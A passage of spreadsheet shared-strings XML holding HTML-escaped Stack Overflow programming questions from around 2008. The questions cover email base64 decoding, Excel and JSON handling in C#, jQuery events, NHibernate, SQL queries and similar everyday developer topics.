    <t xml:space="preserve">&lt;p&gt;I am having difficulty determining if the body of a text email message is base64 encoded.
if it is then use this line of code;
making use of jython 2.2.1&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dirty=base64.decodestring(dirty)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;else continue as normal.&lt;/p&gt;
&lt;p&gt;This is the code I have atm. What line of code will allow me to extract this from the email:   &lt;/p&gt;
&lt;p&gt;"Content-Transfer-Encoding: base64"   &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import email, email.Message
import base64
def _get_email_body(self):
    try:
        parts=self._email.get_payload()
        check=parts[0].get_content_type()
        if check=="text/plain":
            part=parts[0].get_payload()
            enc = part[0]['Content-Transfer-Encoding']
            if enc == "base64":
                dirty=base64.decodestring(dirty)
        elif check=="multipart/alternative":
            part=parts[0].get_payload()
            enc = part[0]['Content-Transfer-Encoding']
            if part[0].get_content_type()=="text/plain":
                dirty=part[0].get_payload()
                if enc == "base64":
                    dirty=base64.decodestring(dirty)
            else:
                return "cannot obtain the body of the email"
        else:
            return "cannot obtain the body of the email"
        return dirty
    except:
        raise
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;OKAY this code works now! thanks all&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to fill DataTable from an in-memory Excel Worksheet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our client gets Excel files in Excel's HTML format.(That's the way it arrives; nobody has any control over that.) We then need to run a report based on the data in the file. Using ADO.NET (OleDbReader) results in a "External file not in expected format" exception.&lt;/p&gt;
&lt;p&gt;If the data is converted to regular Excel format it gets read in OK. However this is not really a solution as it imposes an extra step they must take and they are not too computer-literate at the best of times.&lt;/p&gt;
&lt;p&gt;The only solution I could come up with was to use Excel Automation to create a new spreadsheet, fill it with the same data, and read that one instead. But ADO.NET seem to only be able read from a file on disk. I could of course save the file and delete it when I'm done with it (which I've verified will work). But I'm uncomfortable with the idea of messing around with their filesystem. So my first question is - is there a way to fill a DataTable from an in-memory Excel Worksheet?&lt;/p&gt;
&lt;p&gt;Additionally, I don't like the whole business with using Automation; it's incredibly slow. The operation takes over 30 seconds even without filling the DataTable. So a solution that makes it any slower is not going to be any good. That brings me to my second question - Is there a better way to accomplish what I'm trying here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScriptSerializer C# and Generics (newbie mistakes I think!)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;WinForms C#.. am getting some JSON in the format below (bottom of message) and trying to deserialise using:&lt;/p&gt;
&lt;p&gt;using System.Web.Script.Serialization;&lt;/p&gt;
&lt;p&gt;When I had simply this json returned:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
"objects": [
    {
        "categoryid": "1",
        "name": "funny",
        "serverimageid": "1",
        "dateuploaded": "2008-11-17 16:16:41",
        "enabled": "1"
    },
    {
        "categoryid": "2",
        "name": "happy",
        "serverimageid": "2",
        "dateuploaded": "2008-11-17 16:17:00",
        "enabled": "1"
    },
    {
        "categoryid": "3",
        "name": "sad",
        "serverimageid": "3",
        "dateuploaded": "2008-11-16 16:17:13",
        "enabled": "1"
    }
]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then is was easy to deserialize: (yikes.. a bit hacky)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// s is the string
s = s.Remove(0, 11);
// last }
int stringLength = s.Length;
s = s.Remove(stringLength - 1, 1);
listOfCategories = serializer1.Deserialize&amp;lt;List&amp;lt;Category&amp;gt;&amp;gt;(s);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Category
    {
        public int categoryID;
        public string name;
        public int imageID;
        public DateTime dateUpdated;
        public int isActive;
        public int displayOrder;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However now, I'm stuck!  Have tried a list of lists... but can't get anywhere..&lt;/p&gt;
&lt;p&gt;Much appreciated any help.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
    "objects": {
        "categories": [
            {
                "name": "Congratulations",
                "imageID": "1",
                "isActive": "1",
                "displayOrder": "0",
                "dateUpdated": "2008-11-27 00:00:00"
            },
            {
                "name": "Animals",
                "imageID": "2",
                "isActive": "1",
                "displayOrder": "0",
                "dateUpdated": "2008-11-26 00:00:00"
            },
            {
                "name": "Romance",
                "imageID": "3",
                "isActive": "1",
                "displayOrder": "0",
                "dateUpdated": "2008-11-24 00:00:00"
            }
        ],
        "present": [
            {
                "presentID": "1",
                "name": "Tiger",
                "categoryID": "2",
                "imageID": "1",
                "dateUpdated": "2008-11-27",
                "isActive": "1",
                "isAnimated": null,
                "isInteractive": null,
                "isAdaptive": null,
                "webLinkURL": null
            },
            {
                "giphtID": "2",
                "name": "Donkey",
                "categoryID": "2",
                "imageID": "2",
                "dateUpdated": "2008-11-27",
                "isActive": "1",
                "isAnimated": null,
                "isInteractive": null,
                "isAdaptive": null,
                "webLinkURL": null
            },
            {
                "giphtID": "3",
                "name": "Elephant",
                "categoryID": "2",
                "imageID": "3",
                "dateUpdated": "2008-11-27",
                "isActive": "1",
                "isAnimated": null,
                "isInteractive": null,
                "isAdaptive": null,
                "webLinkURL": null
            }
        ]
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can you write info to a Windows "global (in-memory) variable" than can be shared by various applications, using Windows APIs?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Maybe this cannot be done, but please help or suggest how this can be achieved without writing something to disk.&lt;/p&gt;
&lt;p&gt;Lets suppose there are two string values that I want to share between two independent applications.&lt;/p&gt;
&lt;p&gt;You are welcome to provide code sample in any programming language.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to bind a click event on a recently added &lt;a&gt; tag in jquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 6 links on a page to an mp3.&lt;/p&gt;
&lt;p&gt;The plugin I installed replaces those links with a swf and plays that mp3 inline.&lt;/p&gt;
&lt;p&gt;The problem I &lt;em&gt;had&lt;/em&gt; was that it was possible to activate all 6 links and have all audio playing at once. I &lt;em&gt;solved&lt;/em&gt; that problem (I feel in a clumsy novice way though) by catching the &amp;lt; a &gt; tag before it was replaced with the embed tag and then putting it back when another one was clicked.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;However, this is my problem now&lt;/strong&gt;: the &amp;lt; a &gt; tag I put back looses it's onClick event (i think that's what is happening) and so, if clicked a second time, fails to switch like the first time.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(".storyplayer a").bind("click", function() {
    	// replace the &amp;lt;a&amp;gt; tag from the previous media player installation
    	if (previousplayerlocation != null) {$("#" + previousplayerlocation + " .storyplayer").html(graboldcode);}		
    	// now remember this installation's &amp;lt;a&amp;gt; tag before it's replaced
    	graboldcode = $(this).parent().html();
    	// remember where I grabbed this &amp;lt;a&amp;gt; tag from
    	previousplayerlocation = $(this).parents("div.storylisting").attr("id");
    	// replaces the &amp;lt;a&amp;gt; tag with the media player.
    	$(this).media({width: 190,height: 30});
    	return false;
    });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am asking if there is a way to re-assign the click event to the "if" statement?
Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio C#-settings and StyleCop (MS Source Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have settings for Visual Studio, in XML or a .vssettings-file, that is compatible with &lt;a href="http://code.msdn.microsoft.com/sourceanalysis" rel="nofollow"&gt;StyleCop&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;I've used the book &lt;a href="http://rads.stackoverflow.com/amzn/click/0321545613" rel="nofollow"&gt;Framework Design Guidelines: Conventions, Idioms, and Patterns for Reusable .NET Libraries&lt;/a&gt; for guidance on what Microsoft finds to be the correct way to format C# and set my Visual Studio-settings accordingly.&lt;/p&gt;
&lt;p&gt;But when I use "Format Document" in Visual Studio, StyleCop will fire on all cylinders and complains on all sorts of things.&lt;/p&gt;
&lt;p&gt;Some errors even seems impossible to set in the settings. Like curly braces should be on a new line, if something spans for more than one row.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I filter out the rows which contain a particular column with null or empty data in SQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In SQL, How we make a check to filter all row which contain a column data is null or empty ?&lt;br /&gt;
For examile  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select Name,Age from MEMBERS
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We need a check Name should not equal to null or empty.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I need help: .NET Sample code to read file file properties like title and summary</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help: .NET Sample code to read file file properties like title and summary in .NET&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I need some help in Undo function in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I write a Text Editor with Java , and  I want to  add Undo function to it &lt;/p&gt;
&lt;p&gt;but without UndoManager Class , I need to use a Data Structure like Stack or LinkedList but the Stack class in Java use Object parameters e.g : push(Object o) , Not Push(String s)
I need some hints or links .
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Aspect-oriented programming in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best tool for Java for aspect-oriented programming? &lt;/p&gt;
&lt;p&gt;The requirements for a tool are of course IDE support, expressiveness and proper documentation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>binary .dat file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;how can access the binary data file(.DAT). i am using geonames API. can anyone help me? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wanted : review of collection libraries features / issues / performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know there are couple 3rd party collection libraries out there (C5, PowerCollections and I guess loads more of other not so complete libraries) as well as the System.Collections.Generics classes. I am however quite unsure which library use to when. I have tried the C5 collections, but some sources claim that they are slower then the default collections.&lt;/p&gt;
&lt;p&gt;Which libraries do you use and why ? Do you ever wander away from the defaults (there are some collections types that are not supported - so sometimes it may be neccessary).&lt;/p&gt;
&lt;p&gt;Do you know of any links for such 3rd party libraries reviews ?&lt;/p&gt;
&lt;p&gt;Basically I am looking for anything that could shed some light figuring out what collections libraries to use when.&lt;/p&gt;
&lt;p&gt;PS: I am not looking for explanations of when to use linked list and when to use a dictionary. I am looking for choices in the world of collection Libraries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the Constant Value of the Underline font in Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the Constant Value of the Underline font in Java ?&lt;/p&gt;
&lt;p&gt;Font.BOLD  &lt;strong&gt;bold&lt;/strong&gt; font&lt;/p&gt;
&lt;p&gt;Font.ITALIC  &lt;em&gt;italic&lt;/em&gt; font&lt;/p&gt;
&lt;p&gt;What is the UNDERLINE font Constant ?
I try all the available constants but it didn't work .&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are areas where you can program artificial intelligence?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Welcome!
I very enjoyed programming artificial intelligence in my studies - neural networks, expert machines and other. But in work I develop mainly web applications. &lt;/p&gt;
&lt;p&gt;And now I think about returning to such programming, maybe in hobby, or maybe in work. Are there areas where AI is commonly used in applications development and programmer with such skills can search work?&lt;/p&gt;
&lt;p&gt;Or maybe I can sold some ideas to my boss and use AI to extend some of our applications. &lt;/p&gt;
&lt;p&gt;What are you experience and ideas with using AI in applications?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I Insert or Update (or overwrite) a record using NHibernate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a row to the database regardless of whether it already exists or not. Before using NHibernate this was done with a stored procedure. The procedure would attempt an update and if no rows were modified it would fallback to an insert. This worked well because the application doesn't care if the record exists.&lt;/p&gt;
&lt;p&gt;With NHibernate, the solutions I have found require loading the entity and modifying it, or deleting the entity so the new one can be inserted. The application does have to care if the record already exists. Is there a way around that?&lt;/p&gt;
&lt;h2&gt;Does the Id Matter?&lt;/h2&gt;
&lt;h3&gt;Assigned Id&lt;/h3&gt;
&lt;p&gt;The object has a keyword as an assigned id and is the primary key in the table.&lt;/p&gt;
&lt;p&gt;I understand that SaveOrUpdate() will call the Save() or Update() method as appropriate based on the Id. Using an assigned id, this won't work because the id isn't an unsaved-value. However a Version or Timestamp field could be used as an indicator instead. In reality, this isn't relevant because this only reflects on whether the object in memory has been associated with a record in the database; it does not indicate if the record exists or not in the database.&lt;/p&gt;
&lt;h3&gt;Generated Id&lt;/h3&gt;
&lt;p&gt;If the assigned id were truly the cause of the problem, I could use a generated id instead of the keyword as the primary key. This would avoid the NHibernate Insert/Update issue as it would effectively always insert. However, I still need to prevent duplicate keywords. With a unique index on the keyword column it will still throw an exception for a duplicate keyword even if the primary key is different.&lt;/p&gt;
&lt;h2&gt;Another Approach?&lt;/h2&gt;
&lt;p&gt;Perhaps the problem isn't really with NHibernate, but the way this is modeled. Unlike other areas of the application, this is more data-centric rather object-centric. It is nice that  NHibernate makes it easy to read/write and eliminates the stored procedures. But the desire to simply write without regard to existing values doesn't fit well with the model of an object's identity model. Is there a better way to approach this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use library org.hibernate in java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I create new project in Netbeans, but when I look the library it still using JDK 1.6 (default) I want to change into JDK 6 Update 10 but how? I already instal JDK 6 Update 10 but when I import org.hibernate the neatbeans didn't know which library that org.hibernate.&lt;/p&gt;
&lt;p&gt;someone can help me? THX&lt;/p&gt;
</t>
  </si>
  <si>
    <t>variable.ToString() vs. Convert.ToString(variable)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have an integer that I need to convert to a string (I might be displaying the value to the user by means of a TextBox, for example.&lt;/p&gt;
&lt;p&gt;Should I prefer &lt;code&gt;.ToString()&lt;/code&gt; or &lt;code&gt;Convert.ToString()&lt;/code&gt;. They both do the same thing (don't they?).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int someValue = 4;
// You can do this
txtSomeValue.Text = someValue.ToString();
// Or this...
txtSomeValue.Text = Convert.ToString(someValue);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Assuming that there is no runtime difference between the two, then my reasons come down to aesthetics and consistency. Recently I have been favouring &lt;code&gt;Convert.ToString()&lt;/code&gt; as to me it says "hey, I want the &lt;em&gt;value&lt;/em&gt; of this thing as a string". However I know that this is not strictly true...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex intellisense forgets flash.*</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Eclipse 3.3.2 with the Flex Builder Plugin (3.0.194161) and the Flex SDK 3.2. Recently the intellisense has started forgetting about everything in the flash.* package EXCEPT flash.errors.*&lt;/p&gt;
&lt;p&gt;The code still compiles, but attempting to automatically resolve something (CTRL+SPACE) removes any of the flash.* import statements and thus causes a compile error. As it stands I have to either not use CTRL+SPACE, or re-add my flash.* before compiling.&lt;/p&gt;
&lt;p&gt;I have tried recreating the workspace/project and have re-installed the Flex SDK, but I still get the same problem.&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>BlogEngine.Net Code Formatting Extension that works?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For months now I've been trying to find a code syntax formatting extension that works for BlogEngine.Net.  I'm not fond of the behavior of the default formatting extension, and have tried a couple of others (manoli is among them), but they always seem to interact badly with the TinyMCE editor.  Does anyone know of an extension that works, or a different approach that will allow me to make code samples pretty on my blog without hacking the crap out of the HTML myself?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Simple role authentication in asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do a simple role authentication in .NET - but am lost in the profusion of apis...&lt;/p&gt;
&lt;p&gt;I would like to have a web.config per directory with role access like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;authorization&amp;gt;
    &amp;lt;allow roles="admin"/&amp;gt;
    &amp;lt;deny users="*"/&amp;gt;
&amp;lt;/authorization&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in my login page, where I do FormsAuthentication.RedirectFromLoginPage I want to specify the role of the logged in user (admin, user, etc...) 
I have no need for the RoleManagementProviders and the overkilled feature (in my case) of RoleManagement. &lt;/p&gt;
&lt;p&gt;What API do I need to user to just specify the role of a user?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a Java string from the contents of a file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using the idiom below for some time now. And it seems to be the most wide-spread, at least on the sites I've visited.&lt;/p&gt;
&lt;p&gt;Is there a better/different way to read a file into a string in Java?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private String readFile(String file) throws IOException {
    BufferedReader reader = new BufferedReader(new FileReader (file));
    String         line = null;
    StringBuilder  stringBuilder = new StringBuilder();
    String         ls = System.getProperty("line.separator");
    try {
        while((line = reader.readLine()) != null) {
            stringBuilder.append(line);
            stringBuilder.append(ls);
        }
        return stringBuilder.toString();
    } finally {
        reader.close();
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Unit testing with Entity Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to test my Entities that are built using Entity Framework.
My concern is that using Entity Framework means directly working with data source.
So any ideas how to unit testing Entity Framework based components?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Register Startup Script Control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to make a web control where I can register client startup scripts inline with my aspx because I hate registering in the codebehind!&lt;/p&gt;
&lt;p&gt;An example of what I have so far:&lt;/p&gt;
&lt;p&gt;&amp;lt;Ben:StartupScript runat="server"&amp;gt;&lt;/p&gt;
&lt;p&gt;var form = document.getElementById("&amp;lt;% =form1.ClientID %&gt;");&lt;/p&gt;
&lt;p&gt;&amp;lt;/Ben:StartupScript&amp;gt;&lt;/p&gt;
&lt;p&gt;Currently, I am overriding the OnPreRender method of the control, rendering the contents of the control to a string and then manually registering that string as a  startup script using ClientScript.RegisterStartupScript on the Page. I also override the Render method in order not to render the control. I should also note that I have the ParseChildren attribute set to false and the PersistChildren attribute set to true.&lt;/p&gt;
&lt;p&gt;All seems to be working well, but my control allows other web controls inside it (such as Button). Apart from being unintuitive, this can result in runtime errors. I would love to be able to clear the controls but this is impossible given the &amp;lt;% ... %&gt; code block.&lt;/p&gt;
&lt;p&gt;So, is it possible to prevent developers from embedding child controls whilst still allowing codeblocks?&lt;/p&gt;
&lt;p&gt;Also, is this idea any good or is it fundamentally flawed? lol.&lt;/p&gt;
&lt;p&gt;Thanks a bunch,&lt;/p&gt;
&lt;p&gt;Ben&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Navigation, background swap not having every &lt;li&gt; on mouseover</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the following jquery code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#top ul li.corner").mouseover(function(){
    $("span.left-corner").addClass("left-corner-hover");
    $("span.right-corner").addClass("right-corner-hover");
    $("span.content").addClass("content-hover");
}).mouseout(function(){
    $("span.left-corner").removeClass("left-corner-hover");
    $("span.right-corner").removeClass("right-corner-hover");
    $("span.content").removeClass("content-hover");
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But as you see in the selector that is going to do every li.corner that the mouse is over. i am trying to get it to do only the one the mouse is over, how would I achieve that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I control/override the auto-complete in my iPhone app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to control/override the auto-complete feature when a user enters text in my iPhone app.&lt;/p&gt;
&lt;p&gt;Specifically I'd like to auto-complete a collection of words I supply.  For example say my name is BillBobJohn. When I type "billb" auto-complete will suggest BillBobJohn.&lt;/p&gt;
&lt;p&gt;How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Vertically align text within input field of fixed-height without display: table or padding?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The line-height property usually takes care of vertical alignment, but not with inputs. Is there a way to automatically center text without playing around with padding?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is There An OSS Implementation Of Google AdWords</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an open source implementation of Google AdWords, or is the technology protected in some way (such as being patented)?&lt;/p&gt;
&lt;p&gt;Edit: To clarify, I'm looking for a 3rd party implementation of an AdWords-like system (that has nothing to to with Google AdWords beyond the concept and superficial similarity).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Blogs to freshen up my math (in practice)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My question, &lt;a href="http://stackoverflow.com/questions/11743/useful-math-for-programmers"&gt;his question&lt;/a&gt;, but blogs as resources to be specific.&lt;/p&gt;
&lt;p&gt;I find blogs great to keep up to date... refresh material...&lt;/p&gt;
&lt;p&gt;So do you know any blogs who tackle math-related programming problems...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I dynamically get the set of classes from the current python module?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a python module that defines a number of classes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class A(object):
    def __call__(self):
        print "ran a"
class B(object):
    def __call__(self):
        print "ran b"
class C(object):
    def __call__(self):
        print "ran c"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From within the module, how might I add an attribute that gives me all of the classes?&lt;/p&gt;
&lt;p&gt;dir() gives me the names of everything from within my module, but I can't seem to figure out how to go from the name of a class to the class itself from &lt;em&gt;within&lt;/em&gt; the module.&lt;/p&gt;
&lt;p&gt;From outside of the module, I can simply use &lt;code&gt;getattr(mod, 'A')&lt;/code&gt;, but I don't have a &lt;code&gt;self&lt;/code&gt; kind of module from within the module itself.&lt;/p&gt;
&lt;p&gt;This seems pretty obvious.  Can someone tell me what I'm missing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Methods and Anonymous Types</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that you cannot return anonymous types from methods but I am wondering how the Select extension method returns an anonymous type. Is it just a compiler trick?&lt;/p&gt;
&lt;p&gt;Edit&lt;/p&gt;
&lt;p&gt;Suppose L is a List. How does this work?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;L.Select(s =&amp;gt; new { Name = s })
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The return type is IEnumerable&amp;lt;'a&gt; where 'a = new {String Name}&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best practices for Hardware Description Languages (Verilog, VHDL etc.)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What best practices should be observed when implementing HDL code?&lt;/p&gt;
&lt;p&gt;What are the commonalities and differences when compared to more common software development fields?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Running unit tests on nested functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I come from the Java world, where you can hide variables and functions and then run unit tests against them using reflection.  I have used nested functions to hide implementation details of my classes so that only the public API is visible.  I am trying to write unit tests against these nested functions to make sure that I don't break them as I develop.  I have tried calling one of the nested functions like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def outer():
    def inner():
        pass
outer.inner()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which results in the error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;AttributeError: 'function' object has no attribute 'inner'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Is there a way for me to write unit tests against these nested functions?  If not, is there a way to trigger the name munging for function names like you can for class variables by prefixing them with __?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I atomically rename/replace 2 or more tables and views?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a table X and a view Y (that has the same structure as X) is there a way to rename X to Z and Y to X atomically so that no query will ever see nothing named X? Renaming X and creating the view would also be valid.&lt;/p&gt;
&lt;p&gt;The point would be to, as part of a schema migration plan, replace the old tables with views that simulate the old version from the new version so both sets of client code can run at the same time.&lt;/p&gt;
&lt;p&gt;MySQL is my choice but info on others would be useful as well.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Comparing 2 XML docs and applying the changes to source document</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's my problem.I have 2 xmlfiles with identical structure, with the second xml containing only few node compared to first.&lt;/p&gt;
&lt;p&gt;File1&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;root&amp;gt;
    &amp;lt;alpha&amp;gt;111&amp;lt;/alpha&amp;gt;
    &amp;lt;beta&amp;gt;22&amp;lt;/beta&amp;gt;
    &amp;lt;gamma&amp;gt;&amp;lt;/gamma&amp;gt;
    &amp;lt;delta&amp;gt;&amp;lt;/delta&amp;gt;
  &amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;File2&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;root&amp;gt;
    &amp;lt;beta&amp;gt;XX&amp;lt;/beta&amp;gt;
    &amp;lt;delta&amp;gt;XX&amp;lt;/delta&amp;gt;
 &amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This's what the result should look like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;root&amp;gt;
    &amp;lt;alpha&amp;gt;111&amp;lt;/alpha&amp;gt;
    &amp;lt;beta&amp;gt;22&amp;lt;/beta&amp;gt;
    &amp;lt;gamma&amp;gt;&amp;lt;/gamma&amp;gt;
    &amp;lt;delta&amp;gt;XX&amp;lt;/delta&amp;gt;
 &amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Basically if the node contents of any node in File1 is blank then it should read the values from File2(if it exists, that is).&lt;/p&gt;
&lt;p&gt;I did try my luck with Microsoft XmlDiff API but it didn't work out for me(the patch process didn't apply changes to the source doc). Also I'm a bit worried about the DOM approach that it uses, because of the size of the xml that I'll be dealing with.
Can you please suggest a good way of doing this.
I'm using C# 2 &lt;/p&gt;
</t>
  </si>
  <si>
    <t>using a vector of column names, to generate a sql statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A problem that we need to solve regularly at my workplace is how to build sql statements based on user supplied table/column names.  The issue I am trying to address is the commas between column names.  &lt;/p&gt;
&lt;p&gt;One technique looks something like this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;selectSql  = "SELECT ";
for (z = 0; z &amp;lt; columns.size(); z++)
{
    selectSql += columns[z]._name;
    selectSql += ", "; 
}
selectSql = selectSql(0, selectSql.len() - 2);
selectSql += "FROM some-table";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Another technique looks something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;selectSql  = "SELECT ";
for (z = 0; z &amp;lt; columns.size(); z++)
{
    selectSql += columns[z]._name;
    if (z &amp;lt; columns.size() - 1) 
        selectSql += ", "; 
}
selectSql += "FROM some-table";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am not particularly enthralled by either of these implementations.&lt;/p&gt;
&lt;p&gt;I am interesting in hearing ideas for other ways to address this issue, with an eye toward making the code easier to read/understand/maintain.&lt;/p&gt;
&lt;p&gt;What alternate techniques are available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cruisecontrol.NET &amp; IIS7 Static File Handler Problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get Cruisecontrol.NET running with Server 2008/IIS7 and when I try and navigate to the dashboard I get the following error:
HTTP Error 404.17 - Not Found
The requested content appears to be script and will not be served by the static file handler.&lt;/p&gt;
&lt;p&gt;I'm a bit lost in IIS7 so it could be something pretty straightforward. They (cc.net) do some funny stuff with http handlers in the web.config which may be related to the problem:&lt;/p&gt;
&lt;p&gt;
    	&lt;/p&gt;
&lt;p&gt;Anyone have any pointers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic logical expression parsing/evaluation in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a need to evaluate user-defined logical expressions of arbitrary complexity on some PHP pages.  Assuming that form fields are the primary variables, it would need to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;substitute"varibles" for form
fields values;&lt;/li&gt;
&lt;li&gt;handle comparison operators,
minimally ==, &amp;lt;, &amp;lt;=, &gt;= and &gt; by
symbol, name (eg eq, lt, le, ge, gt
respectively);&lt;/li&gt;
&lt;li&gt;handle boolean operators not, and, or and
possibly xor by name, symbol (eg !,
&amp;amp;&amp;amp;, || and ^^ respectively);&lt;/li&gt;
&lt;li&gt;handle literal values for strings
and numbers;&lt;/li&gt;
&lt;li&gt;be plaintext not XML (eg "firstname
== '' or lastname == ''); and&lt;/li&gt;
&lt;li&gt;be reasonably performant.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now in years gone by I've written recursive descent parsers that could build an expression tree and do this kind of thing but thats not a task I'm relishing in PHP so I'm hoping there are things out there that will at least get me some of the way there.&lt;/p&gt;
&lt;p&gt;Suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Removing a file in a Restricted Folder in Linux</t>
  </si>
  <si>
